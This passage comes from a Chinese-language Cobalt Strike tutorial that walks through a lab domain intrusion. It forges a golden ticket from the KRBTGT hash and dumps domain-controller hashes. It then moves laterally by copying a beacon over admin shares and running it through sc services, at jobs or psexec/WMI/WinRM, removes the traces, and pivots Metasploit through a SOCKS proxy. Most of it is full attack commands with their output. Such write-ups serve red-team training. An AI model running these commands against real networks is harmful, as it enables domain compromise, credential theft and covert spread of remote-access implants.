</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>加载 kerberos 票据</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>kerberos_ticket_use <span class="token punctuation">[</span><span class="token operator">/</span>path<span class="token operator">/</span>to<span class="token operator">/</span>file<span class="token punctuation">.</span>ticket<span class="token punctuation">]</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h3 id="黄金票据">黄金票据 <a href="#黄金票据" class="header-anchor">#</a></h3> <p>黄金票据 <code>Golden Ticket</code> 是用 KRBTGT 帐户的密钥（NTLM 哈希）伪造的 Kerberos 身份验证票据（TGT）。KRBTGT 帐户是域中一个特殊的隐藏帐户，DC 颁发的所有 TGT 都用它的密钥加密。然后攻击者可以像哈希传递那样，直接凭这张票据以任意帐户的身份完成认证，从而在网络内部不受注意地移动。对防御方而言，一旦怀疑 KRBTGT 哈希泄露，需要连续重置两次 KRBTGT 密码，才能让已伪造的票据失效。</p> <p><strong>使用 mimikatz 伪造黄金票据需要：</strong></p> <p><strong>1、目标的用户名及域名</strong></p> <p><strong>2、域的 SID 值</strong></p> <p>域的 SID 值即安全标识符 <code>Security Identifiers</code>，使用 <code>whoami /user</code> 命令可查看。注意不需要 SID 最后的一组数字，那一组是用户的 RID（相对标识符），去掉它之后剩下的部分才是域 SID。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell whoami <span class="token operator">/</span>user
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: whoami <span class="token operator">/</span>user
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 43 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:

用户信息
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>

用户名        SID                                         
============= ============================================
teamssix\daniel S<span class="token operator">-</span>1<span class="token operator">-</span>5<span class="token operator">-</span>21<span class="token operator">-</span>5311978431<span class="token operator">-</span>183514165<span class="token operator">-</span>284342044<span class="token operator">-</span>1000
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br></div></div><p>因为不需要 SID 最后一组数字，所以这里要使用的 SID 也就是 <code>S-1-5-21-5311978431-183514165-284342044</code>。</p> <p><strong>3、DC 中 KRBTGT 用户的 NTLM 哈希</strong></p> <p>DC 中 KRBTGT 用户的 NTLM 哈希可以通过 dcsync 或 hashdump 获得，下面的 hashdump 命令在域控制器的 SYSTEM 权限会话下运行。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; hashdump
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to dump hashes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 82501 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received password hashes:
Administrator:500:aca3b435b5z404eeaad3f435b51404he:12cb161bvca930994x00cbc0aczf06d1:::
Guest:501:aca3b435b5z404eeaad3f435b51404he:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aca3b435b5z404eeaad3f435b51404he:z1f8417a00az34scwb0dc15x66z43bg1:::
daniel:1108:aca3b435b5z404eeaad3f435b51404he:12cb161bvca930994x00cbc0aczf06d1:::
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p>Cobalt Strike 在 <code>Access -&gt; Golden Ticket</code> 中可以打开生成黄金票据的界面。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs18-1.png" alt=""></p> <p>信息填完之后，选择 Build，需要注意 Domain 需要填写成 FQDN 格式，即完全合格域名 <code>Fully Qualified Domain Name</code> ，也就是类似于 <code>teamssix.com</code> 的格式。</p> <p>此时可以通过 <code>shell dir \\host\C$</code> 检查自己是否有权限，也可以使用 PowerShell 运行 whoami 查看自己是谁。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; powershell <span class="token function">Invoke-Command</span> <span class="token operator">-</span>computer WinDC <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span>whoami<span class="token punctuation">}</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">Invoke-Command</span> <span class="token operator">-</span>computer WinDC <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span>whoami<span class="token punctuation">}</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 203 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
teamssix\administrator
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><h2 id="_5、远程代码执行">5、远程代码执行 <a href="#_5、远程代码执行" class="header-anchor">#</a></h2> <p>实现代码执行的四个步骤：</p> <p>1、与目标建立信任关系</p> <p>2、复制可执行文件到目标上</p> <p>3、在目标上运行可执行文件</p> <p>4、实现对目标的控制</p> <p>以上是根据视频教程中直译的结果，个人感觉其实这一节叫<code>横向移动的方法</code>更为合适。</p> <p><strong>创建可执行文件</strong></p> <p>可执行文件可以在 Cobalt Strike 的 <code>Attack -&gt; Packages -&gt; Windows Executable(s)</code> 处创建。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs19-1.png" alt=""></p> <p>如果用于内网中的横向移动，那么强烈建议使用 SMB Beacon，SMB Beacon 就是为了内网横向扩展渗透而设计的。</p> <p><strong>上传可执行文件</strong></p> <p>首先使用 Cobalt Strike 的 <code>upload</code> 功能把文件上传到当前 beacon 所在的主机，接着通过管理共享（如 C$）把它复制到目标主机上。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell <span class="token function">copy</span> file<span class="token punctuation">.</span>exe \\host\C$\Windows\Temp
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; upload <span class="token operator">/</span>root<span class="token operator">/</span>beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to upload <span class="token operator">/</span>root<span class="token operator">/</span>Desktop<span class="token operator">/</span>beacon<span class="token punctuation">.</span>exe as beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 289302 bytes

beacon&gt; shell <span class="token function">copy</span> beacon<span class="token punctuation">.</span>exe \\WinTest\C$\Windows\Temp
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">copy</span> beacon<span class="token punctuation">.</span>exe \\WinTest\C$\Windows\Temp
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 72 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
已复制         1 个文件。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><p><strong>执行文件（方法一）</strong></p> <p>1、生成 Windows Service EXE 并上传</p> <p>2、在目标主机上创建一个服务</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell <span class="token function">sc</span> \\host create name binpath= c:\windows\temp\file<span class="token punctuation">.</span>exe
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell <span class="token function">sc</span> \\wintest create beacon binpath= c:\windows\temp\beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">sc</span> \\wintest create beacon binpath= c:\windows\temp\beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 93 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
<span class="token namespace">[SC]</span> CreateService 成功
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><blockquote><p>注：记住 binpath 路径</p></blockquote> <p>3、在目标主机上启动服务</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell <span class="token function">sc</span> \\host <span class="token function">start</span> name
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell <span class="token function">sc</span> \\wintest <span class="token function">start</span> beacon
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">sc</span> \\wintest <span class="token function">start</span> beacon
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 56 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
SERVICE_NAME: beacon 
        <span class="token function">TYPE</span>               : 10  WIN32_OWN_PROCESS  
        STATE              : 2  START_PENDING 
                                <span class="token punctuation">(</span>NOT_STOPPABLE<span class="token punctuation">,</span> NOT_PAUSABLE<span class="token punctuation">,</span> IGNORES_SHUTDOWN<span class="token punctuation">)</span>
        WIN32_EXIT_CODE    : 0  <span class="token punctuation">(</span>0x0<span class="token punctuation">)</span>
        SERVICE_EXIT_CODE  : 0  <span class="token punctuation">(</span>0x0<span class="token punctuation">)</span>
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3816
        FLAGS              : 
        
beacon&gt; link wintest
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked to link to \\wintest\pipe\msagent_da00
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 36 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> established link to child beacon: 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>130
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br></div></div><p>4、清除痕迹与服务</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>shell sc \\host delete name
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell <span class="token function">del</span> beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">del</span> beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 57 bytes

beacon&gt; shell <span class="token function">del</span> \\wintest\C$\windows\temp\beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">del</span> \\wintest\C$\windows\temp\beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 83 bytes

beacon&gt; shell <span class="token function">sc</span> \\wintest delete beacon
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">sc</span> \\wintest delete beacon
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 69 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
<span class="token namespace">[SC]</span> DeleteService 成功
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br></div></div><p><strong>执行文件（方法二）</strong></p> <p>1、生成 Windows EXE 并上传，注意这里生成的 EXE 和<code>方法一</code>生成的 EXE 是不一样的类型，这里生成的是<code>Windows EXE</code>，不是方法一中的<code>Windows Service EXE</code></p> <p>2、找到目标系统上的时间</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell net time \\host
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell net time \\windc
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: net time \\windc
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 49 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
\\windc 的当前时间是 2020<span class="token operator">/</span>8<span class="token operator">/</span>30 14:54:09
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>3、创建一个计划任务</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell at \\host HH:mm C:\path\to\bad<span class="token punctuation">.</span>exe
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell at \\windc 15:00 C:\windows\temp\beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: at \\windc 15:00 C:\windows\temp\beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 76 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
新加了一项作业，其作业 ID = 1
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>4、当计划任务被执行时，执行 link hostname 即可上线主机</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; link windc
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked to link to \\windc\pipe\msagent_d76a
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 34 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> established link to child beacon: 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>144
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><strong>beacon 的自动操作</strong></p> <p>前面说的两种执行文件的方法都需要往磁盘里上传文件，如果不想往磁盘中上传文件，也可以使用 beacon 的自动操作。</p> <ul><li>使用一个服务运行可执行文件</li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>psexec <span class="token namespace">[target]</span> <span class="token namespace">[share]</span> <span class="token namespace">[listener]</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><ul><li>使用一个服务运行 Powershell 单行程序</li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>psexec_psh <span class="token namespace">[target]</span> <span class="token namespace">[listener]</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><ul><li>通过 WinRM 运行 Powershell 单行程序</li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>winrm <span class="token namespace">[target]</span> <span class="token namespace">[listener]</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><ul><li>通过 WMI 运行 Powershell 单行程序</li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>wmi <span class="token namespace">[target]</span> <span class="token namespace">[listener]</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>在 Cobalt Strike 的 <code>View --&gt; Targets</code> 下，右击主机选择 <code>Jump</code> 也可以通过图形化的方式进行上述操作，这样也使得横向移动更加简单。</p> <p>接下来进行一下演示，目前手中有一个普通机器的管理员会话，我们先在这台机器上运行 <code>net view</code> 查看一下当前域环境中的主机信息。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; net view
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run net view
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 104504 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
List of hosts:
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
 Server Name             IP Address                       Platform  Version  <span class="token function">Type</span>   Comment
 <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>             <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>                       <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>  <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>  <span class="token operator">--</span>-<span class="token operator">-</span>   <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>            
 WINDC                   192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>144                  500       6<span class="token punctuation">.</span>1      PDC    
 WINTEST                 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>130                  500       6<span class="token punctuation">.</span>1         
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><p>因为是自己本地搭建的测试环境，所以主机很少，可以看到当前域中有两台机器，再利用 PowerView 查找一下具有本地管理员访问权限的用户</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; powershell<span class="token operator">-</span>import PowerView<span class="token punctuation">.</span>ps1
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to import: PowerView<span class="token punctuation">.</span>ps1
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 101224 bytes

beacon&gt; powershell <span class="token function">Find-LocalAdminAccess</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">Find-LocalAdminAccess</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 329 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
WinDC<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><p>接下来在 WinDC 上运行 psexec，因为这里是 64 位的，所以选择 psexec64，之后监听选择一个 smb beacon，会话就选择已经上线的 wintest 主机的会话，并勾选使用当前会话的访问令牌。</p> <p>这里笔者认为应该是因为当前在 wintest 主机上有 windc 的管理员账户登录着，所以使用 wintest 的访问令牌是可以获取 windc 的信任的，类似于 <a href="https://teamssix.com/year/200419-150622.html" target="_blank" rel="noopener noreferrer">CS 学习笔记 17 节<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>里的描述方法，如有不正确之处，还请多多指教。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs19-2.png" alt=""></p> <p>之后，windc 主机就上线了，域中如果还有其他主机，也可以使用这种方法去横向移动。</p> <h1 id="_0x07-转发">0x07 转发 <a href="#_0x07-转发" class="header-anchor">#</a></h1> <h2 id="_1、socks-代理转发">1、SOCKS 代理转发 <a href="#_1、socks-代理转发" class="header-anchor">#</a></h2> <p>在进行转发操作之前，需要将当前会话改为交互模式，也就是说输入命令就被执行，执行 <code>sleep 0</code> 即为交互模式。</p> <h3 id="socks">Socks <a href="#socks" class="header-anchor">#</a></h3> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs20-1.png" alt=""></p> <ul><li><p>在当前 beacon 上可以右击选择 <code>Pivoting --&gt; SOCKS Server</code> 设置一个 Socks4a 代理服务</p></li> <li><p>或者使用命令 <code>socks [port]</code> 进行设置</p></li> <li><p>使用命令 <code>socks stop</code> 关闭 Socks 
代理服务</p></li> <li><p>在 <code>View --&gt; Proxy Pivots</code> 中可以看到已经创建的代理服务</p></li></ul> <h3 id="metasploit-连接到-socks-代理服务">Metasploit 连接到 Socks 代理服务 <a href="#metasploit-连接到-socks-代理服务" class="header-anchor">#</a></h3> <ul><li>CS 中创建好代理后，在 Metasploit 中可以运行以下命令通过 beacon 的 Socks 代理进行通信</li></ul> <div class="language- line-numbers-mode"><pre class="language-text"><code>setg Proxies socks4:127.0.0.1:[port]
setg ReverseAllowProxy true
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>如果感觉上面命令比较长，还可以在 <code>Proxy Pivots</code> 界面中点击 <code>Tunnel</code> 按钮查看命令。</p> <ul><li>运行以下命令来停止</li></ul> <div class="language- line-numbers-mode"><pre class="language-text"><code>unsetg Proxies
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>setg 和 unsetg 命令表示在 Metasploit 中全局有效，不用在每次选择模块后再重新设置。</p> <p><strong>演示</strong></p> <p>1、环境说明</p> <blockquote><p>攻击机 IP：192.168.175.200</p> <p>上线主机：外部 IP 192.168.175.130、内部 IP 192.168.232.133</p> <p>攻击目标：192.168.232.0/24 地址段</p></blockquote> <p>当前已经上线了一个 IP 为 192.168.175.130 的主机，通过 ipconfig 发现，该主机也在 192.168.232.0/24 地址段内。</p> <p>但当前攻击机无法访问 232 的地址段，因此如果想对 232 段内的主机发起攻击，就可以采用将 192.168.175.130 作为跳板机访问的方式。</p> <p>2、设置 socks 代理</p> <p>开启交互模式</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>sleep 0
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; <span class="token function">sleep</span> 0
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to become interactive
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 16 bytes
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>开启 socks 代理</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>socks 9527
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; socks 9527
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> started SOCKS4a server on: 9527
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 16 bytes
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>以上操作也可以通过图形化的方式进行。</p> <p>3、Metasploit 中进行设置</p> <p>开启 Metasploit 后，运行 setg 命令</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>setg Proxies socks4:192.168.175.200:9527
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>msf5 &gt; setg Proxies socks4:192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200:9527
Proxies =&gt; socks4:192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200:9527
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>4、扫描 192.168.232.0/24 地址段中的 445 端口</p> <p>这里作为演示，只扫描一下 445 端口</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>use auxiliary/scanner/smb/smb_version
set rhost 192.168.232.0/24
set threads 64
exploit
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>msf5 &gt; use auxiliary<span class="token operator">/</span>scanner<span class="token operator">/</span>smb<span class="token operator">/</span>smb_version 

msf5 auxiliary<span class="token punctuation">(</span>scanner<span class="token operator">/</span>smb<span class="token operator">/</span>smb_version<span class="token punctuation">)</span> &gt; <span class="token function">set</span> rhost 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24 
rhost =&gt; 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24

msf5 auxiliary<span class="token punctuation">(</span>scanner<span class="token operator">/</span>smb<span class="token operator">/</span>smb_version<span class="token punctuation">)</span> &gt; <span class="token function">set</span> threads 64
threads =&gt; 64

msf5 auxiliary<span class="token punctuation">(</span>scanner<span class="token operator">/</span>smb<span class="token operator">/</span>smb_version<span class="token punctuation">)</span> &gt; exploit 
use auxiliary<span class="token operator">/</span>scanner<span class="token operator">/</span>smb<span class="token operator">/</span>smb_version
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned  44 of 256 hosts <span class="token punctuation">(</span>17<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned  64 of 256 hosts <span class="token punctuation">(</span>25<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned 110 of 256 hosts <span class="token punctuation">(</span>42<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned 111 of 256 hosts <span class="token punctuation">(</span>43<span class="token operator">%</span> complete<span class="token punctuation">)</span>
